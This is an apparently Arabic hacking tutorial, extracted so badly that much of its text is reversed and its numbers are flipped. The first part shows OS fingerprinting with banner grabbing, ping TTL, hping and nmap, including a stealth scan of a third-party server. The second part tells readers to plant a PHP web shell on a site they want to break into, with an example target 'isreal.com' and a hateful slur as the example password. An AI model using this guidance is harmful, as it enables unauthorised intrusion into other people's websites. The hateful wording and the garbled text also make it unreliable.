‫ھي صفحة الخطأ رقم ‪004‬الدالة على عدم العثور على الصفحة المطلوبة‪ .‬و‪ ‬‬ ‫‪ 964‬‬ ‫بعدھ ا يعطینا الخادم الكثیر من المعلومات عنه‪ .‬مثل نوع الخادم و أصداره‪ ,‬و‪ ‬‬ ‫نظام التشغیل و المزيد من المعلومات الخرى‪ .‬‬ ‫‪08 1.0.0.721 [root@localhost root]# telnet‬‬ ‫‪...1.0.0.721 Trying‬‬ ‫‪.1.0.0.721 Connected to‬‬ ‫‪.']^' Escape character is‬‬ ‫‪1.1/HEAD 127.0.0.1 HTTP‬‬ ‫‪HTTP/1.1 400 Bad Request‬‬ ‫‪Date: Sat, 05 Oct 2002 18:01:20 GMT‬‬ ‫‪2.0.1/Server: Apache/1.3.20 (Unix) (Red­Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV‬‬ ‫‪10_42.1/PHP/4.0.6 mod_perl‬‬ ‫‪Connection: close‬‬ ‫‪1­9588­Content­Type: text/html; charset=iso‬‬ ‫‪.Connection closed by foreign host‬‬ ‫ھنا قمنا بتفیذ الطلب ‪, HEAD‬الذي يعطینا رأس الصفحة فقط‪ ,‬و بالتالي‪ ‬‬ ‫نحدد مجال المعلومات التي نحتاجھا‪ .‬‬ ‫ينبغي ان نذكر ان الغالبیة العظمى من برامج الـ ‪ Scan‬و برامج تحديد‪ ‬‬ ‫أنظمة التشغیل المختلفة‪ ,‬و الوسیلة الكثر شھرة‪ ,‬و سھولة‪ ,‬موقع الـ‪ ‬‬ ‫‪ www.netcraft.com‬تقوم بتحديد نظام التشغیل بھذه الطريقة‪ .‬‬


‫أعتقد اننا ذكرنا معظم التقنیات المعروفة‪ ,‬أو بالصح‪ ,‬المشھورة في ھذا‪ ‬‬ ‫المجال سوف ننتقل إلى بعض التقنیات الكثر تخصصا و تعقیدا‪ .‬و لكن بشكل‪ ‬‬ ‫مبسط و سطحي‪ .‬نظًر لتشعبھا و تقدمھا‪ .‬و في حالة الرغبة في الدراسة و‪ ‬‬ ‫ا‪ ‬‬ ‫التعمق بشكل أكبر‪ ,‬في ھ ذا الموضوع‪ ,‬من الممكن البحث عن ھذا الموضوع‪ ‬‬ ‫في النترنت‪ .‬‬ ‫~~~~~~~~~~~~~~~~~~~~~~~~‪ ‬‬ ‫‪ 074‬‬ ‫‪ Remote OS Detection Using Ping & TTL‬‬ ‫نعم‪ ,‬سوف نستعمل أداة الـ ‪ Ping‬في تحديد نظام التشغیل المستھدف‪ .‬و‬ ‫لكي نتمكن من المتابعة‪ ,‬علینا أن نتحدث قلی ً عن ھ ذه الداه‪ .‬تستخدم‪ ‬‬ ‫ل‪ ‬‬ ‫الـ‪ Ping‬في عملیات أكتشاف و تحديد الخطاء في أنظمة الشبكات‪ .‬تعتمد على‬ ‫برتوكول الـ‪ . ICMP‬حیث يتلخص عملھا ببساطة في أرسال الطلب ‪ICMP Type‬‬ ‫(‪ 8 (ECHO REQUEST‬و يقوم الجھاز المستھدف بأستقبال ھذا الطلب و الرد‪ ‬‬ ‫علیه بـ ( ‪ . ICMP Type 0 (ECHO REPLAY‬الـ(‪ TTL (Time To Live‬ھي عبارة‪ ‬‬ ‫عن قیمة توضع في أحدى خانات حزمة البیانات ‪ . Data Packet‬و لكل نظام‪ ‬‬ ‫تشغیل قیمة معینة للـ ‪ .TTL‬و عن طريق جدول معین‪ ,‬يمكن تحديد نظام‪ ‬‬ ‫التشغیل‪ ....‬‬ ‫‪1.0.0.721 C:\>ping‬‬ ‫‪:Pinging 127.0.0.1 with 32 bytes of data‬‬ ‫‪Reply from 23=127.0.0.1: bytes time<10ms 821=TTL‬‬ ‫‪Reply from 23=127.0.0.1: bytes time<10ms 821=TTL‬‬ ‫‪Reply from 23=127.0.0.1: bytes time<10ms 821=TTL‬‬ ‫‪Reply from 23=127.0.0.1: bytes time<10ms 821=TTL‬‬ ‫‪:1.0.0.721 Ping statistics for‬‬ ‫‪ ,)Packets: Sent = 4, Received = 4, Lost = 0 (0% loss‬‬ ‫‪:Approximate round trip times in milli­seconds‬‬ ‫‪ Minimum = 0ms, Maximum = 0ms, Average = 0ms‬‬ ‫قمت بتنفیذ المر على جھ ازي‪ ,‬و عند النظر إلى النتائج‪ ,‬نجد أن قیمة الـ‪ ‬‬ ‫‪ TTL= 821‬و ھ ي القیمة المرتبطة بأنظمة الـ ‪ Windows‬بشكل عام‪ .‬و في ما‪ ‬‬ ‫يلي‪ ,‬الجدول الخاص بأنظمة التشغیل‪ ,‬و قیم الـ‪ TTL‬المرتبطة بھا ‪ -:‬‬ ‫‪OS VERSION PLATFORM TTL‬‬ ‫‪Windows 9x/NT Intel 23‬‬ ‫‪Windows 9x/NT Intel 821‬‬ ‫‪ 174‬‬ ‫‪Windows 2000 Intel 128‬‬ ‫‪DigitalUnix 4.0 Alpha 60‬‬ ‫‪Unisys x Mainframe 64‬‬ ‫‪Linux 2.2.x Intel 64‬‬ ‫‪FTX(UNIX) 3.3 STRATUS 64‬‬ ‫‪SCO R5 Compaq 64‬‬ ‫‪Netware 4.11 Intel 128‬‬ ‫‪AIX 4.3.x IBM/RS6000 60‬‬ ‫‪AIX 4.2.x IBM/RS6000 60‬‬ ‫‪Cisco 11.2 7507 60‬‬ ‫‪Cisco 12.0 2514 255‬‬ ‫‪IRIX 6.x SGI 60‬‬ ‫‪FreeBSD 3.x Intel 64‬‬ ‫‪OpenBSD 2.x Intel 64‬‬


‫‪Solaris 8 Intel/Spar 64‬‬ ‫‪Solaris 2.x Intel/Sparc 255‬‬ ‫‪ 472‬‬ ‫ھذه ھ ي بعض النظمة و القیم المرتبطة بھا‪ .‬عند التطبیق في الحیاة‪ ‬‬ ‫ق‪ .‬عند‪ ‬‬ ‫العملیة‪ ,‬سوف نلحظ أن القیم الناتجة ل تساوي القیم السابقة أطل ً‬ ‫ا‪ ‬‬ ‫مرور حزم البیانات‪ ,‬بأي ‪ Router‬أو ‪ Node‬فإن قیمة الـ‪ TTL‬تنقص بمقدار ‪ . 1‬لذا‪ ‬‬ ‫ينبغي علینا أن تقوم بأستعمال الداة ‪ Tracert.exe‬على الـ ‪ Windows‬أو‪ ‬‬ ‫‪ traceroute‬على الـ‪ .linux‬حیث نقوم بإضافة عدد الـ‪ Nodes‬بیننا و بین النظام‪ ‬‬ ‫المستھدف‪ ,‬إلى قیمة الـ‪ TTL‬الناتجة‪ ,‬للحصول على القیمة الصحیحة‪ ,‬و‪ ‬‬ ‫بالتالي تحديد نظام التشغیل‪ .‬‬ ‫ينبغي أن نذكر ھنا أن ھ ذه الطريقة لم تعد مجدية في الكثیر من الحیان‪ ,‬‬ ‫م‪ .‬بوساطة‪ ‬‬ ‫نظًر لن معظم النظمة حالیا تقوم بتغییر ھذه القیم أو منعھا تما ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫الجدران النارية أو أنظمة الـ‪ IDS‬التي تقوم بفلترة و مراقبة البیانات الداخلة و‪ ‬‬ ‫الخارجة من الشبكة‪ .‬‬ ‫````````````````````````````````````‪ ‬‬ ‫‪ OS Fingerprinting‬‬ ‫د‪ .‬تعتمد ھذة‪ ‬‬ ‫تعد ھ ذه الطريقة‪ ,‬أحدث الطرق و أكثرھا تقدما و تعقی ً‬ ‫ا‪ ‬‬ ‫الطريقه على وجود العديد من الختلفات بین أنظمه التشغیل المختلفة و‪ ‬‬ ‫أصداراتھا‪ ,‬في التعامل مع مواصفات بروتوكول الـ‪ .(RFC793,791) TCP/IP‬حیث‪ ‬‬ ‫تختلف الـ‪ Options‬و الـ ‪ Requests‬التي قد يقبلھا أو يعطلھا نظام التشغیل‪ .‬كما‪ ‬‬ ‫تعتمد على الختلف في رسائل الخطأ و صورھا التي يرسلھا النظام‪ .‬و من‪ ‬‬ ‫ھنا‪ ,‬و عن كريق أجراء عده تجارب مختلفة على العديد من أنظمة التشغیل و‪ ‬‬ ‫أصداراتھ ا‪ ,‬يمكن أن نحدد ھ ذه الختلفات بین النظمة‪ .‬و يسھل علینا بعد ذلك‪ ‬‬ ‫أن نحدد بدقة معقولة نسبیا‪ ,‬نظام التشغیل و اصداره‪ .‬‬ ‫فیما يلي بعض المثلة المبسطة‪ ,‬و التي تعتبر توضیحیة فقط‪ ,‬حیث ان‪ ‬‬ ‫المر أكثر تعقید ً و صعوبة‪ .‬سوف نستعمل في الختبارات التالیة الداتین‪ ‬‬ ‫ا‪ ‬‬ ‫التالیتین‪ . icmpush , hping :‬الداة الولى‪ hping ,‬تستعمل للرسال حزم ‪TCP‬‬ ‫و أمكانیة تحديد خیارات و ‪ flags‬مختلفة لھا‪ ,‬و في نفس الوقت تقوم بأنتظار‪ ‬‬ ‫الرد‪ .‬الداة الثانیة‪ icmpush ,‬تستعمل في أرسال حزم الـ‪ , ICMP‬و أستقبال‪ ‬‬ ‫الرد علیھا‪ .‬‬ ‫‪ 374‬‬ ‫لقد قمت بأقتباس ھ ذا المثال من أحدى المقالت‪ ,‬لنني أردت أن أكون‪ ‬‬ ‫واثقا من النتائج‪ ,‬و صیغ الوامر‪ ,‬لذا ففي الغالب لن يكون للعنوان الذي نجري‪ ‬‬ ‫م‪ ,‬نريد القیام بعملیة الـ ‪ OS‬‬ ‫علیه الختبار أي معنى‪ .‬لنفترض أن لدينا نظا ً‬ ‫ا‪ ‬‬ ‫‪ fingerorinting‬لھذا النظام‪ .‬سوف يكون العمل كالتالي‪ ...‬‬ ‫بداية سوف نقوم بأرسال ‪ ICMP type 17 Request‬للھدف‪ ,‬و يقوم ھذا‪ ‬‬ ‫الطلب بالحصول على الـ ‪ subnet mask‬المستخدم على شبكه النظام‪ ‬‬ ‫المستھدف‪ ,‬و يكون رد النظام ھو ‪ ICMP type 19 Replay (Address Mask‬‬ ‫(‪ .Replay‬تعد ھذه ھ ي احدى نقاط الختلف بین أنظمة التشغیل المختلفة‪ .‬‬ ‫حیث أن معظم أنظمة الـ‪ *nix‬ل تستجیب لھذا الطلب‪ ,‬ول ترسل رد ً على‪ ‬‬ ‫ا‪ ‬‬ ‫الطلق‪ ,‬في حین تقوم أنظمة الـ ‪ windows‬بالرد بشكل طبیعي‪ ...‬‬ ‫‪71.1.01.01 [root@localhost]#icmpush ­vv ­mask‬‬ ‫‪1.1.01.01 = ­> Outgoing interface‬‬ ‫‪­> ICMP total size = 12 bytes‬‬


‫‪1.1.01.01 = ­> Outgoing interface‬‬ ‫‪­> MTU = 1500 bytes‬‬ ‫‪­> Total packet size (ICMP + IP) = 32 bytes‬‬ ‫‪)71.1.01.01( 71.1.01.01 ICMP Address Mask Request packet sent to‬‬ ‫‪...Recieving ICMP Replies‬‬ ‫‪icmpush: program finished OK‬‬ ‫قمنا بأستعمال أداة الـ ‪ icmpush‬لرسال طلب الـ‪ ­mask‬و قام البرناج‪ ‬‬ ‫بأرسال الطلب‪ ,‬و أنتظار الرد‪ ,‬و عندما لم يستقبل رد ً قام بطبع رسالة تفید‪ ‬‬ ‫ا‪ ‬‬ ‫بأنتھاء العملیة‪ .‬‬ ‫كما سبق و أن ذكرنا‪ ,‬نلحظ ان النظام السابق لیس أحد أنظمة الـ‪ ‬‬ ‫‪ windows‬حیث أننا لم نستقبل ردا ً على الطلق‪ .‬نستنتج من ذلك أن النظام‪ ‬‬ ‫ربما يكون أحد أفراد عائلة الـ‪ . *nix‬‬ ‫‪ 474‬‬ ‫لنحدد النظام أكثر‪ ,‬نقوم بالختبار التالي‪ .‬عند أرسال أي حزمة ‪ ,TCP‬علیھا‪ ‬‬ ‫‪ SYN/ACK flags‬إلى أي نظام ‪ , *nix‬أو حتى ‪ windows‬فإن النظام يستجیب‪ ‬‬ ‫بأرسال حزمة ‪ TCP‬تحمل الـ‪ . RST flag‬النظمه الوحیدة التي تشذ عن ھذه‪ ‬‬ ‫ق‪ .‬و من ھنا يمكننا‪ ‬‬ ‫القاعدة‪ ,‬ھي انظمة الـ ‪ , *BSD‬حیث ل تستجیب أطل ً‬ ‫ا‪ ‬‬ ‫تحديد ما إذا كان النظام المستھدف يعمل على ‪ *BSD‬أم ل‪ .‬‬ ‫‪[root@localhost]#hping 10.10.1.17 ­c1 ­p 23 ­S ­A‬‬ ‫‪hping 10.10.1.17 (eth0 10.10.1.17) : SA set, 40 data bytes‬‬ ‫قمنا بأستخدام الداة ‪ hping‬لرسال الحزمة المطلوبة‪ ,‬و لم نستقبل أي‪ ‬‬ ‫رد على الطلق‪ ,‬مما يعني أن النظام ھو ‪ .*BSD‬و بأجراء المزيد من الختبارات‪,‬‬ ‫ض‪.‬ما سبق ھو مثال‪ ‬‬ ‫من الممكن تحديد توزيعة نظام التشغیل‪ ,‬و رقم الصدار أي ً‬ ‫ا‪ ‬‬ ‫بسیط و سطحي للغاية‪ ,‬حول ھذا الموضوع‪ .‬و ھو للمساعدة على فھم‪ ‬‬ ‫الموضوع ل أكثر‪ .‬‬ ‫`````````````````````````````````````‪ ‬‬ ‫‪ OS fingerprinting‬‬ ‫يتم تصنیف الـ ‪ OS fingerprinting‬إلى القسمین التالیین‪ -:‬‬ ‫‪ + Active OS Fingerprinting‬‬ ‫و يعتمد على أرسال حزم من الیبانات‪ ,‬و أستقبال الردود ‪ ,‬و تحلیلھا‪ ‬‬ ‫للحصول على النتائج‪ .‬و ينقسم ھ ذا الجزء بدوره إلى قسمین‪ -:‬‬ ‫‪ ­ TCP/IP Fingerprinting‬‬ ‫‪ 574‬‬ ‫‪ ­ ICMP Fingerprinting‬‬ ‫‪ + Passive OS Fingerprinting‬‬ ‫و يعتمد بشكل أساسي على الـ ‪ . Sniffing‬و لن أقوم بمناقشته في ھذا‬ ‫الملف‪ .‬ربما في الحلقات القادمة‪ ;(...‬‬ ‫````````````````````````````````````‪ ‬‬ ‫‪ TCP/IP Fingerprinting‬‬ ‫ق‪ ,‬تعتمد فكرة الـ‪ TCP/IP Fingerprinting‬على أختلف‪ ‬‬ ‫كما ذكرنا ساب ً‬ ‫ا‪ ‬‬ ‫مواصفات بروتوكول الـ‪ TCP/IP‬على مختلف أنظمة التشغیل‪ .‬بمعنى أخر‪ ,‬تختلف‬ ‫أستجابة كل نظام تشغیل عن الخر‪ ,‬بالنسبة لنفس طلب أو أتصال ‪ TCP‬معین‪.‬‬ ‫بحیث يمكن تحديد نظام التشغیل بمجرد المقارنة بأستجابة نظام التشغیل‪ ‬‬ ‫ق‪ .‬‬ ‫المعلومة مسب ً‬ ‫ا‪ ‬‬ ‫توجد العديد من الدوات التي تمكننا من القیام بھذا النوع من الفحص‪ ,‬‬


. *nix‫ب على أنظمة الـ‬ ً ‫ و التي تعمل كلھا تقري‬,‫والمتوفرة على شبكة النترنت‬ ‫ا‬ nmap ‫نظًر لن‬ .checkos, SS by Su1d, queso, nmap : ‫من أھم ھذه الدوات‬ ‫ا‬ ‫ فسوف يقتصر حديثنا علیه‬,ً ‫ و الكثر أنتشاًر و أستعما‬, ‫ھو القوى و ألفضل‬ ‫ا‬ ‫ل‬ .‫في الوقت الحالي‬ ‫ھو عبارة عن أداة لستكشاف ا‬ (Network MAPer) nmap ,‫ی‬ ً ‫مبدئ‬ ‫ الوظائف‬.‫ كما يمكن بالطبع أستخدامه بالنسبة للجھزة المنفردة‬.‫الشبكات‬ -:‫ ھي كالتالي‬nmap‫الساسیة للـ‬ + .‫التأكد من وجود الجھزه على الشبكة‬ + .)‫ماھي المنافذ المفتوحة علیھا (ما ھي الخدمات العاملة علیھا‬ + .)‫ماھ و نوع نظام التشغیل و ما أصداره ( بدقه مناسبة‬ + .‫ الموجود على ھذه الشبكة‬Filtering ‫تحديد نوع الـ‬ 674 ‫ بالعديد من‬nmap ‫ يتمیز‬.‫بالضافة إلى الكثیر من المعلومات الخرى‬ ‫ يستعمل حزم‬, port scanning‫ حیث يقوم بدعم العديد من تقنیات الـ‬.‫الممیزات‬ ‫ يتمیز بالقوة و‬.‫ يقوم بتمییز عدد كبیر من أنظمة التشغیل‬. UDP ‫ و الـ‬TCP ‫الـ‬ ‫ و المیزة الساسیة في‬.‫ حیث يمكن أستخدامه لفحص شبكات كاملة‬,‫السرعة‬ ‫ حیث ان ملف المساعدةالخاص به‬,‫ الجید‬Documentation ‫ ھي التوثیق‬,‫رأيي‬ ‫ بغض النظر عن العديد من الوثائق‬,‫يحمل الكثیر من المعلومات و المثلة‬ .‫الموجوده على النترنت حول استعماله‬ ‫ البسیطة مع بعض‬Parameters ‫سوف نقوم بمناقشه بعض الخیارات و‬ ...‫المثلة‬ ...‫ بدون أي خیارات‬nmap‫عند تشغیل الـ‬ [root@localhost root]# nmap Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options] <host or net list> Some Common Scan Types ('*' options require root privileges) * ­sS TCP SYN stealth port scan (default if privileged (root)) ­sT TCP connect() port scan (default for unprivileged users) * ­sU UDP port scan ­sP ping scan (Find any reachable machines) * ­sF,­sX,­sN Stealth FIN, Xmas, or Null scan (experts only) ­sR/­I RPC/Identd scan (use with other scan types) Some Common Options (none are required, most can be combined): * ­O Use TCP/IP fingerprinting to guess remote operating system ­p <range> ports to scan. Example range: '1­1024,1080,6666,31337' ­F Only scans ports listed in nmap­services ­v Verbose. Its use is recommended. Use twice for greater effect. ­P0 Don't ping hosts (needed to scan www.microsoft.com and others) * ­Ddecoy_host1,decoy2[,...] Hide scan using many decoys ­T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy ­n/­R Never do DNS resolution/Always resolve [default: sometimes resolve] ­oN/­oX/­oG <logfile> Output normal/XML/grepable scan logs to <logfile> ­iL <inputfile> Get targets from file; Use '­' for stdin * ­S <your_IP>/­e <devicename> Specify source address or network interface ­­interactive Go into interactive mode (then press h for help) Example: nmap ­v ­sS ­O www.my.com 192.168.0.0/16 '192.88­90.*.*' SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES 477


‫ سوف نقوم‬,‫ المھم‬. ): ‫ و ما خفي كان أعظم‬,‫ھذا ملف الستعمال فقط‬ ‫ و من الممكن للراغب في الستزادة‬,ً ‫بمناقشة بعض الخیارات الكثر أستعما‬ ‫ل‬ .‫ الخاصه بالبرنامج‬man page‫الرجوع إلى الـ‬ ­:‫ مثال‬++ [root@localhost root]# nmap ­sT ­O ­vv 127.0.0.1 Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Host localhost.localdomain (127.0.0.1) appears to be up ... good. Initiating Connect() Scan against localhost.localdomain (127.0.0.1) Adding open port 23/tcp Adding open port 6000/tcp Adding open port 22/tcp Adding open port 1027/tcp Adding open port 111/tcp The Connect() Scan took 1 second to scan 1601 ports. For OSScan assuming that port 22 is open and port 1 is closed and neither are firewalled Interesting ports on localhost.localdomain (127.0.0.1): (The 1596 ports scanned but not shown below are in state: closed) Port State Service 22/tcp open ssh 23/tcp open telnet 111/tcp open sunrpc 1027/tcp open IIS 6000/tcp open X11 Remote operating system guess: Linux Kernel 2.4.0 ­ 2.5.20 OS Fingerprint: TSeq(Class=RI%gcd=1%SI=26D8DB%IPID=Z%TS=100HZ) T1(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW) T2(Resp=N) T3(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW) T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E %ULEN =134%DAT=E) Uptime 0.007 days (since Sat Oct 5 01:12:31 2002) TCP Sequence Prediction: Class=random positive increments Difficulty=2545883 (Good luck!) TCP ISN Seq. Numbers: CF9FF245 CF78E942 CFD91AAE D0406C91 D0535F65 D05E00C1 IPID Sequence Generation: All zeros 478 Nmap run completed ­­ 1 IP address (1 host up) scanned in 5 seconds ‫في المثال السابق قمت بأجراء فحص على جھازي الخاص بأستخدام‬ -:‫الخیارات التالیة‬ + sT TCP connect() port scan ‫ و ھي تعد‬.‫ كوسیلة للفحص‬TCP ‫و يقوم ھ ذا الخیار بتحديد حزم ال‬ ‫ كما أنھا السھل‬,‫الطريقة الكثر إنتشاًر و أستعمال بین برامج الفحص المختلفة‬ ‫ا‬


‫ ھي انھ ا ل تحتاج إلى أي صلحیات من‬,‫ المیزة الوحیدة لھذه الطريقة‬.‫ف‬ ً ‫أكتشا‬ .‫ كبقیة الطرق الخرى‬,‫المستخدم‬ +­O Use TCP/IP fingerprinting to guess remote operating system TCP/IP ‫ أستعمال الـ‬.‫ھذه ھي النقطة الساسیة في الموضوع‬ .‫لتحديد نظام التشغیل‬fingerprinting + ­v Verbose ‫ھذا الخیار يقوم بجعل البرنامج بعرض معلومات عن العملیات التي يقوم‬ .‫ و يستخدم مرتین لزيادة تأثیره و زيادة المعلومات المخرجة‬.‫بھ ا‬ `````````````````````````````` -:‫ مثال آخر‬++ [root@localhost root]# nmap ­sS ­O ­vv brokenarrow.org ) /Starting nmap V. 3.00 ( www.insecure.org/nmap .Host ns.tibp.com (65.38.3.34) appears to be up ... good )43.3.83.56( Initiating SYN Stealth Scan against ns.tibp.com Adding open port 3372/tcp Adding open port 1025/tcp Adding open port 80/tcp 974 Adding open port 443/tcp Adding open port 3389/tcp Adding open port 1026/tcp Adding open port 465/tcp Adding open port 6103/tcp Adding open port 1027/tcp Adding open port 21/tcp Adding open port 53/tcp Adding open port 26/tcp Adding open port 10000/tcp The SYN Stealth Scan took 67 seconds to scan 1601 ports. For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled Interesting ports on ns.tibp.com (65.38.3.34): (The 1583 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 26/tcp open unknown 53/tcp open domain 80/tcp open http 135/tcp filtered loc­srv 137/tcp filtered netbios­ns 139/tcp filtered netbios­ssn 443/tcp open https 445/tcp filtered microsoft­ds 465/tcp open smtps 1025/tcp open NFS­or­IIS 1026/tcp open LSA­or­nterm 1027/tcp open IIS 1080/tcp filtered socks 3372/tcp open msdtc 3389/tcp open ms­term­serv 6103/tcp open RETS­or­BackupExec ‫ا‬


‫‪10000/tcp open snet­sensor­mgmt‬‬ ‫‪Remote operating system guess: Windows 2000/XP/ME‬‬ ‫‪OS Fingerprint:‬‬ ‫)‪TSeq(Class=RI%gcd=2%SI=DC67%TS=0‬‬ ‫)‪T1(Resp=Y%DF=Y%W=FAF0%ACK=S++%Flags=AS%Ops=MNWNNT‬‬ ‫)=‪T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops‬‬ ‫)‪T3(Resp=Y%DF=Y%W=FAF0%ACK=S++%Flags=AS%Ops=MNWNNT‬‬ ‫)=‪T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops‬‬ ‫)=‪T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops‬‬ ‫)=‪T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops‬‬ ‫)=‪T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops‬‬ ‫‪PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E‬‬ ‫‪%ULEN=1‬‬ ‫)‪34%DAT=E‬‬ ‫‪ 480‬‬ ‫‪TCP Sequence Prediction: Class=random positive increments‬‬ ‫)‪ Difficulty=56423 (Worthy challenge‬‬ ‫‪TCP ISN Seq. Numbers: 8795E81D 87989E7F 879AB8A3 879EA68B 87A12C7D 87A804B9‬‬ ‫‪IPID Sequence Generation: Busy server or unknown class‬‬ ‫‪Nmap run completed ­­ 1 IP address (1 host up) scanned in 86 seconds‬‬ ‫‪[root@localhost root]#‬‬ ‫ھنا أستعملنا الختیار‪ -sS TCP SYN stealth port scan ‬وھو يستخدم ما‪ ‬‬ ‫يسمى بالتصال نصف المفتوح‪ .‬يتمیز بالسرعة‪ ,‬وقلة المواقع التي تقوم برصده‪.‬‬ ‫و لكن يعیب ھذه الطريقة‪ ,‬انھا تستلزم صلحیات الـ‪ .root ‬‬ ‫نلحظ في ھ ذا المثال ان البرنامج قد وضح لنا المنافذ المفتوحة‪ ,‬و‪ ‬‬ ‫الخدمات العاملة علیھ ا‪ ,‬و أذا ماكانت مفلترة باحدى وسائل الحماية‪ ,‬أم ل‪ .‬‬ ‫‪ 481‬‬ ‫أداة ‪ PHP‬‬ ‫للكاتب‪ aL­narEy:‬‬ ‫نقاط الدرس‪ ‬‬ ‫‪ -1‬ما ھي أداة ال ‪ phpshell‬‬ ‫‪ -2‬كیف تعمل ال ‪ phpshell‬‬ ‫‪ -3‬بعص أوامر ال ‪ phpshell‬‬ ‫‪ -4‬مواقع منوعة أنصح بھا‪ ‬‬ ‫أول ‪ :‬‬ ‫ما ھي أداة ‪ phpshell‬؟‪ ‬‬ ‫اذا صح التعبیر ال ‪ phpshell‬ھي أداة تستطیع من خللھا تنفیذ أوامـر لیـنكس أو‬ ‫يونكس‪ ‬‬ ‫ل أذكـر واحـد مـن التنـین لتـستطیع ان تـتحكم بـالموقع مـن انـشاء الغـاء اعـادة‬ ‫ـ‪ ‬‬ ‫ـ‬ ‫ـ‬ ‫تسمیة و غیرھا‪ ...‬‬ ‫ثانیا‪ :‬‬ ‫كیف يمكن الستفادة من ‪ phpshell‬؟‪ ‬‬ ‫أول ال ‪ phpshell‬ھي عبارة عن عدة ملفات بصیغة ‪ php‬و العنصر الرئیسي فیھا‬ ‫و ھوة‪ shell‬حیث تستطیع أن تعدله‪ ‬‬ ‫من النوتباد لتجعل له ‪ user name & password‬يعني ما حدا يستخدمه غیرك‪ ‬‬ ‫الىن فالنفرض عدلنا الشیل و حطینا فیه الیوزر اللي بدنا ايـاه و الباسـورد اللـي‬ ‫اخترناه‪ ‬‬ ‫نروح نحط الشي بـالموقع المـراد اختراقـه يعنـي لزم تجـد طريقـة لمنـك تحمـل‬ ‫الشیل على الموقع المراد اختراقه و الطريقة تعود لذكائك أو تحمـل الـشیل عـن‬


‫طريق ارفاق ملف في منتدى يعني اللي يعجبك‬ ‫ على الموقع الي بـدنا نخترقـه طیـب و بعـدين ھـال‬shell.php ‫الى ان حملنا ال‬ ‫كیف رح نتحكم فیه ھل فیه برنامج لذلك‬ shell.php ‫ منه ھوة نفسه يعني فرضـا الموقـع‬shell.php ‫ نحنا نتحكم با‬:‫أرد علیك و أقولك‬ ‫اللي بدنا نخترقه كان‬ ‫و رحنا نحنا حملنا الشل على الموقع نفسه فحیكون ھیك‬ /http://isreal.com 284 ‫ اله اسـم تـاني‬shell.php ‫ لحظو انه ممكن يكون‬http://isreal.com/shell.php ‫تختاره انت‬ ‫نروح نكتب اللي كتبناه فوق الموقع و بعده مكان الشل‬ user ‫حیطلعلنـا اذا كنـا حـاطین علـى الـشل باسـورد و يـوزر لزم نكتـبھم مـثل‬ name : aL­narEy Password: fuckisreal ‫و بعدھا نقدر ندخل على الشیل‬ ‫بس تدخل‬ ‫رح يطلعلك مستطیل اسمه‬ Commands ‫ھ ون نحط الوامر اللي بنا نفذھ ا و رح أرفق الوامر في نھاية الدرس‬ ‫أما تحته تماما مربع كبیر ھ ون رح يطلع مثل حطینا أمر عرض الدرايفرات بـالموقع‬ ‫رح يعرضھم ھناك بالمربع‬ ‫يعني اله استخداماته‬ ‫اما باقي ما بقى فحاول تكتشفه بنفسك‬ :‫ثالثا‬ shell ‫بعض أوامر‬ ‫اللي رح أعرب فايدتھ ا قريبا انشاء االله بس انتو فرجوني دعمكم‬ A list of commands and a quick description Alias........ This allows the user view the current aliases awk ........ this allows the user to search for a pattern within a file bdiff ......... compares two large files bfs .......... scans a large file cal ......... shows a calendar cat ......... concatenates and prints a file cc ......... c compiler cd ........ changes directories chgrb ......... changes a file groups ownership chmod ....... changes the permission on a file chown .......... changes the individual ownership of a file cmp ......... compairs two files 483 comm .......... compares two files so as to determine which lines are common to both cp .......... copies file to another location cu ......... calls another unix sysytem date .......... returns the date and time df ......... shows all mounted drives on your machine diff ......... displays the diference between two files du ......... shows the disk usage in blocks for a directory echo ........ echoes the data to the screen or file ed ........ text editor env ......... lists the current environment variables


ex ........ another text editor expr ........ evaluates a mathmatical formula find ........ finds a file f77 .......... fortran complier format ........ initializes a floppy disk grep ......... searches for a pattern within a file help ......... gives help kill ........ stops a running process ln ........ creates a link between two files lpr ......... copies the file to the line printer ls ......... lists the files in a directory mail ........ allows the user to send/receive mail mkdir .......... makes directory more ......... displays a data file to the screen mv ........... used to move or rename files nohup ........ allows a command to continue running even when you log out nroff ......... used to format text passwd ........ changes your password pkgadd ......... installs a new program onto your machine ps ........... Lists the current processes running pwd ........ displays the name of the working directory rm ........ removes files 484 rmdir ........ removes directories set ......... lists all the variables in the current shell setenv ......... sets the environment variables sleep ......... causes a process to become inactive source ......... allows the user to execute a file and update any changed values in that file sort .......... sorts files spell ......... checks for spelling errors in a file split ........ divides a file stty ......... sets the terminal options tail ......... displays the end of a file tar ......... copies all specified files into one touch ........ creates an empty file or updates the time/date stamp on a file troff ......... outputs formatted output tset ........ sets the terminal type umask ......... specify a new creation mask uniq ......... compairs two files uucp ........ unix to unix execute vi ........ full screen editor vipw ......... opens the vi editor as well as password file for editing volcheck ......... checks to see if there is a floppy disk mounted to your machine wc ......... displays detail in the full size who ........ inf. on other people online write ......... send a message to another user


